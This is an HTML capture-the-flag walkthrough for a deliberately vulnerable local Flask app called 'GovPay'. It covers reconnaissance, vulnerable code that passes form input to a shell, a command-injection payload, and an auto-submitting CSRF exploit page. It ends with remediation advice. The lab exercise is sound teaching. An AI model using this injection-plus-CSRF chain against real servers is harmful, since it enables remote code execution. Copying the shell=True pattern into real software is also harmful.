<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>GovPay: Operation Blackout - Masterclass Penetration Report</title>
    <link
        href="https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700&family=Fira+Code:wght@400;500&display=swap"
        rel="stylesheet">
    <style>
        :root {
            --primary: #8D153A;
            --primary-dark: #600b25;
            --accent: #FFBE29;
            --bg: #f0f2f5;
            --text: #1a1a1a;
            --code-bg: #1e1e1e;
            --terminal-bg: #0c0c0c;
        }

        body {
            font-family: 'Inter', sans-serif;
            line-height: 1.8;
            color: var(--text);
            background: var(--bg);
            margin: 0;
            padding: 0;
        }

        .container {
            max-width: 1100px;
            margin: 0 auto;
            padding: 40px 20px;
        }

        /* Header */
        header {
            background: linear-gradient(135deg, var(--primary), var(--primary-dark));
            color: white;
            padding: 100px 0;
            margin-bottom: 60px;
            box-shadow: 0 10px 30px rgba(0, 0, 0, 0.2);
        }

        .header-content h1 {
            font-size: 3.5rem;
            margin: 0 0 15px 0;
            font-weight: 800;
            letter-spacing: -1px;
        }

        .header-content .subtitle {
            font-size: 1.6rem;
            opacity: 0.9;
            font-weight: 300;
        }

        .meta {
            margin-top: 40px;
            display: flex;
            gap: 20px;
            font-size: 1.1rem;
        }

        .meta span {
            background: rgba(255, 255, 255, 0.15);
            padding: 10px 20px;
            border-radius: 30px;
            border: 1px solid rgba(255, 255, 255, 0.2);
            backdrop-filter: blur(5px);
            font-weight: 500;
        }

        /* Sections */
        .phase {
            background: white;
            padding: 50px;
            border-radius: 20px;
            box-shadow: 0 5px 20px rgba(0, 0, 0, 0.05);
            margin-bottom: 50px;
        }

        .phase-header {
            display: flex;
            align-items: center;
            margin-bottom: 40px;
            border-bottom: 2px solid #eee;
            padding-bottom: 20px;
        }

        .phase-number {
            background: var(--primary);
            color: white;
            width: 50px;
            height: 50px;
            border-radius: 50%;
            display: flex;
            align-items: center;
            justify-content: center;
            font-weight: 800;
            font-size: 1.2rem;
            margin-right: 20px;
            box-shadow: 0 4px 10px rgba(141, 21, 58, 0.3);
        }

        h2 {
            margin: 0;
            color: var(--primary);
            font-size: 2rem;
            font-weight: 700;
        }

        h3 {
            color: #2c3e50;
            margin-top: 40px;
            font-size: 1.5rem;
            border-left: 5px solid var(--accent);
            padding-left: 20px;
        }

        h4 {
            color: #555;
            margin-top: 20px;
            font-size: 1.1rem;
            font-weight: 600;
        }

        /* Terminal & Code */
        .terminal {
            background: var(--terminal-bg);
            color: #d4d4d4;
            padding: 25px;
            border-radius: 12px;
            font-family: 'Fira Code', monospace;
            margin: 25px 0;
            border: 1px solid #333;
            box-shadow: 0 15px 40px rgba(0, 0, 0, 0.25);
        }

        .terminal-header {
            display: flex;
            gap: 8px;
            margin-bottom: 15px;
            padding-bottom: 10px;
            border-bottom: 1px solid #333;
        }

        .dot {
            width: 12px;
            height: 12px;
            border-radius: 50%;
        }

        .red {
            background: #ff5f56;
        }

        .yellow {
            background: #ffbd2e;
        }

        .green {
            background: #27c93f;
        }

        .prompt {
            color: #27c93f;
            font-weight: 700;
        }

        .cmd {
            color: white;
            font-weight: 500;
        }

        .output {
            color: #aaa;
            display: block;
            margin-top: 8px;
            line-height: 1.5;
        }

        code {
            background: #e9ecef;
            padding: 3px 8px;
            border-radius: 4px;
            font-family: 'Fira Code', monospace;
            color: var(--primary);
            font-size: 0.9em;
            font-weight: 500;
        }

        /* Deep Dive Box */
        .deep-dive {
            background: #eef2ff;
            border: 1px solid #c7d2fe;
            padding: 25px;
            margin: 30px 0;
            border-radius: 12px;
        }

        .deep-dive-title {
            color: #4338ca;
            font-weight: 700;
            text-transform: uppercase;
            letter-spacing: 1px;
            font-size: 0.9rem;
            margin-bottom: 10px;
            display: flex;
            align-items: center;
            gap: 10px;
        }

        .deep-dive-title::before {
            content: "💡";
            font-size: 1.2rem;
        }

        /* Troubleshooting Box */
        .troubleshooting {
            background: #fff8e1;
            border: 1px solid #ffe082;
            padding: 25px;
            margin: 30px 0;
            border-radius: 12px;
            color: #5d4037;
        }

        .troubleshooting-title {
            color: #f57f17;
            font-weight: 700;
            text-transform: uppercase;
            letter-spacing: 1px;
            font-size: 0.9rem;
            margin-bottom: 10px;
            display: flex;
            align-items: center;
            gap: 10px;
        }

        .troubleshooting-title::before {
            content: "⚠️";
            font-size: 1.2rem;
        }

        /* Images */
        img {
            max-width: 100%;
            border-radius: 12px;
            border: 1px solid #e0e0e0;
            margin: 30px 0;
            box-shadow: 0 10px 30px rgba(0, 0, 0, 0.1);
        }

        /* Footer */
        footer {
            text-align: center;
            padding: 40px 0;
            color: #666;
            font-size: 0.9rem;
            border-top: 1px solid #ddd;
            margin-top: 50px;
        }
    </style>
</head>

<body>

    <header>
        <div class="container header-content">
            <h1>GovPay: Operation Blackout</h1>
            <div class="subtitle">Masterclass Penetration Test Report</div>
            <div class="meta">
                <span><i class="fas fa-user-secret"></i> Author: Sudeepa Wanigarathna</span>
                <span><i class="fas fa-calendar"></i> Date: Nov 26, 2025</span>
            </div>
        </div>
    </header>

    <div class="container">

        <!-- PHASE 0 -->
        <div class="phase">
            <div class="phase-header">
                <div class="phase-number">0</div>
                <h2>Lab Setup & Prerequisites</h2>
            </div>
            <p>Before we hack, we must understand our environment. We are using <strong>Kali Linux</strong>, the
                industry-standard OS for penetration testing.</p>

            <h3>1. Start the Target Server</h3>
            <p>Open your terminal. We need to run the Flask application so it listens for connections.</p>
            <div class="terminal">
                <div class="terminal-header">
                    <div class="dot red"></div>
                    <div class="dot yellow"></div>
                    <div class="dot green"></div>
                </div>
                <span class="prompt">kali@kali:~/govpay_ctf$</span> <span class="cmd">python3 app/app.py</span><br>
                <span class="output">
                    * Serving Flask app 'app'<br>
                    * Running on http://0.0.0.0:8000 (Press CTRL+C to quit)<br>
                </span>
            </div>

            <div class="deep-dive">
                <div class="deep-dive-title">Deep Dive: What is localhost:8000?</div>
                <p><strong>Localhost (127.0.0.1)</strong> is your own computer. <strong>Port 8000</strong> is a specific
                    "door" on your computer where this web application is listening. By running this command, you are
                    opening that door so you can interact with the app via your browser.</p>
            </div>
        </div>

        <!-- PHASE 1 -->
        <div class="phase">
            <div class="phase-header">
                <div class="phase-number">1</div>
                <h2>Reconnaissance (Information Gathering)</h2>
            </div>
            <p>The first step of any hack is to know your target.</p>

            <h3>1. Port Scanning with Nmap</h3>
            <p>We use <strong>Nmap</strong> (Network Mapper) to find open ports.</p>
            <div class="terminal">
                <div class="terminal-header">
                    <div class="dot red"></div>
                    <div class="dot yellow"></div>
                    <div class="dot green"></div>
                </div>
                <span class="prompt">kali@kali:~$</span> <span class="cmd">nmap -sC -sV -p- localhost</span><br>
                <span class="output">
                    PORT STATE SERVICE VERSION<br>
                    8000/tcp open http Werkzeug/2.3.7 Python/3.9.18<br>
                </span>
            </div>
            <div class="deep-dive">
                <div class="deep-dive-title">Deep Dive: Nmap Flags</div>
                <ul>
                    <li><code>-sC</code>: Runs default scripts (checks for common vulnerabilities).</li>
                    <li><code>-sV</code>: Detects service versions (tells us it's Python/Werkzeug).</li>
                    <li><code>-p-</code>: Scans ALL 65,535 ports, not just the top 1000.</li>
                </ul>
            </div>

            <h3>2. Directory Busting with Gobuster</h3>
            <p>We use <strong>Gobuster</strong> to find hidden URLs by guessing names from a list.</p>
            <div class="terminal">
                <div class="terminal-header">
                    <div class="dot red"></div>
                    <div class="dot yellow"></div>
                    <div class="dot green"></div>
                </div>
                <span class="prompt">kali@kali:~$</span> <span class="cmd">gobuster dir -u http://localhost:8000 -w
                    /usr/share/wordlists/dirb/common.txt</span><br>
                <span class="output">
                    /login (Status: 200) -> OK, accessible.<br>
                    /admin (Status: 403) -> Forbidden! Interesting.<br>
                    /static (Status: 301) -> Redirect.<br>
                </span>
            </div>
        </div>

        <!-- PHASE 2 -->
        <div class="phase">
            <div class="phase-header">
                <div class="phase-number">2</div>
                <h2>Vulnerability Analysis</h2>
            </div>
            <p>We found the source code. Let's analyze <code>app.py</code>.</p>

            <h3>The Critical Flaw</h3>
            <pre><code>@app.route('/admin/run-maintenance', methods=['POST'])
def run_maintenance():
    target = request.form.get('target', '')
    command = f"{SCRIPT_PATH} {target}"  # <--- DANGER!
    subprocess.Popen(command, shell=True)</code></pre>

            <div class="deep-dive">
                <div class="deep-dive-title">Deep Dive: Command Injection</div>
                <p>Imagine the server runs: <code>./script.sh [YOUR_INPUT]</code>.</p>
                <p>If you input <code>node1</code>, it runs: <code>./script.sh node1</code>.</p>
                <p>But if you input <code>node1; whoami</code>, it runs:</p>
                <ol>
                    <li><code>./script.sh node1</code> (Command 1)</li>
                    <li><code>;</code> (Separator)</li>
                    <li><code>whoami</code> (Command 2 - <strong>Your Malicious Command</strong>)</li>
                </ol>
                <p>This gives you control over the server.</p>
            </div>
        </div>

        <!-- PHASE 3 -->
        <div class="phase">
            <div class="phase-header">
                <div class="phase-number">3</div>
                <h2>Exploitation (The Attack)</h2>
            </div>

            <h3>Step 1: Craft the Payload</h3>
            <p>We want to read the flag. The flag is at <code>app/flag.txt</code>. We want to move it to
                <code>app/static/out.txt</code> so we can download it.</p>
            <div class="terminal">
                <div class="terminal-header">
                    <div class="dot red"></div>
                    <div class="dot yellow"></div>
                    <div class="dot green"></div>
                </div>
                <span class="prompt">Payload:</span> <span class="cmd">node1; cat app/flag.txt >
                    app/static/out.txt</span>
            </div>

            <h3>Step 2: Create the CSRF Exploit</h3>
            <p>Since only admins can run this, we need to trick an admin. We create a fake page that submits the form
                for them.</p>
            <p><strong>Action:</strong> Open <code>nano</code> to create the file.</p>
            <div class="terminal">
                <div class="terminal-header">
                    <div class="dot red"></div>
                    <div class="dot yellow"></div>
                    <div class="dot green"></div>
                </div>
                <span class="prompt">kali@kali:~$</span> <span class="cmd">nano exploit.html</span>
            </div>
            <p><strong>Paste this code:</strong></p>
            <pre><code>&lt;form action="http://localhost:8000/admin/run-maintenance" method="POST" id="csrf"&gt;
    &lt;input type="hidden" name="target" value="node1; cat app/flag.txt > app/static/out.txt"&gt;
&lt;/form&gt;
&lt;script&gt;document.getElementById("csrf").submit();&lt;/script&gt;</code></pre>
            <p>Save with <code>Ctrl+O</code>, Enter. Exit with <code>Ctrl+X</code>.</p>

            <h3>Step 3: Host the Attack</h3>
            <p>We start a Python web server to host our exploit file.</p>
            <div class="terminal">
                <div class="terminal-header">
                    <div class="dot red"></div>
                    <div class="dot yellow"></div>
                    <div class="dot green"></div>
                </div>
                <span class="prompt">kali@kali:~$</span> <span class="cmd">python3 -m http.server 8888</span>
            </div>

            <h3>Step 4: Execute!</h3>
            <p><strong>The Scenario:</strong></p>
            <ol>
                <li><strong>Login:</strong> Go to <code>http://localhost:8000/login</code>. (User:
                    <code>admin@govpay.lk</code>, Pass: <code>Sup3rS3cur3GovP@ssw0rd!</code>)</li>
                <li><strong>The Trap:</strong> Open a new tab and go to <code>http://localhost:8888/exploit.html</code>.
                </li>
                <li><strong>The Trigger:</strong> The page will flash and redirect you. The exploit has run in the
                    background!</li>
            </ol>
            <img src="file:///home/cerberusmrxi/.gemini/antigravity/brain/67d499bc-ca67-466c-b3fa-e842751f472f/exploit_1_dashboard_1764173260781.png"
                alt="Dashboard">
        </div>

        <!-- PHASE 4 -->
        <div class="phase">
            <div class="phase-header">
                <div class="phase-number">4</div>
                <h2>Post-Exploitation & Verification</h2>
            </div>

            <h3>Retrieving the Flag</h3>
            <p>If the exploit worked, the flag is now in the static folder. We use <code>curl</code> to fetch it.</p>
            <div class="terminal">
                <div class="terminal-header">
                    <div class="dot red"></div>
                    <div class="dot yellow"></div>
                    <div class="dot green"></div>
                </div>
                <span class="prompt">kali@kali:~$</span> <span class="cmd">curl
                    http://localhost:8000/static/out.txt</span><br>
                <span class="output">flag{SRI_LANKA_GOVPAY_EMERGENCY_PATCH_2025}</span>
            </div>

            <div class="troubleshooting">
                <div class="troubleshooting-title">Troubleshooting: 404 Not Found</div>
                <p><strong>Problem:</strong> You get a "404 Not Found" error when curling the file.</p>
                <p><strong>Cause:</strong> The file <code>out.txt</code> was never created. This means the exploit
                    failed to execute.</p>
                <p><strong>Solution Checklist:</strong></p>
                <ul>
                    <li>Did you log in as admin first? (The exploit needs a session).</li>
                    <li>Did you visit the exploit URL in the SAME browser?</li>
                    <li>Is your Python server (port 8888) still running?</li>
                    <li>Check the terminal running <code>app.py</code>. Do you see a POST request to
                        <code>/admin/run-maintenance</code>?</li>
                </ul>
            </div>

            <img src="file:///home/cerberusmrxi/.gemini/antigravity/brain/67d499bc-ca67-466c-b3fa-e842751f472f/exploit_3_flag_1764173381292.png"
                alt="Flag Proof">
        </div>

        <!-- PHASE 5 -->
        <div class="phase">
            <div class="phase-header">
                <div class="phase-number">5</div>
                <h2>Conclusion & Remediation</h2>
            </div>
            <p>This assessment demonstrated that the GovPay system was critically vulnerable to remote compromise.</p>

            <h3>Key Findings</h3>
            <ul>
                <li><strong>Critical Severity:</strong> Unauthenticated Remote Code Execution (via CSRF).</li>
                <li><strong>Root Cause:</strong> Lack of input sanitization and missing CSRF tokens.</li>
            </ul>

            <h3>Immediate Recommendations</h3>
            <p>To secure the system, the development team must:</p>
            <ol>
                <li><strong>Sanitize Input:</strong> Never pass user input directly to a shell. Use
                    <code>subprocess.run(['script', arg])</code> instead of <code>shell=True</code>.</li>
                <li><strong>Implement CSRF Tokens:</strong> Use Flask-WTF to protect all POST forms.</li>
            </ol>

            <div class="deep-dive">
                <div class="deep-dive-title">Final Thought</div>
                <p>Security is not an afterthought. "Emergency" patches often introduce the biggest risks because they
                    bypass standard security reviews. Always validate input, no matter how urgent the fix is.</p>
            </div>
        </div>

    </div>

    <footer>
        <p>&copy; 2025 GovPay Security Team. Report generated by Sudeepa Wanigarathna.</p>
    </footer>

</body>

</html>